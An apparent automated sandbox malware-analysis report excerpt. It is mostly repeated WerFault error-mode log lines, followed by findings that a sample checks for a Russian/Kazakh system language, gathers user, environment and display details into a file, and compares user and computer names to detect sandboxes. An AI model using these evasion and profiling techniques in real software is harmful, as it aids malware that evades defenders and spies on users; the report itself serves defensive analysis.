Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 22_2_012E4B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01594B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 25_2_01594B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 27_2_00AE4B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 29_2_012A4B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01114B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 31_2_01114B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 33_2_012F4B00
Contains functionality to compare user and computer (likely to detect sandboxes)
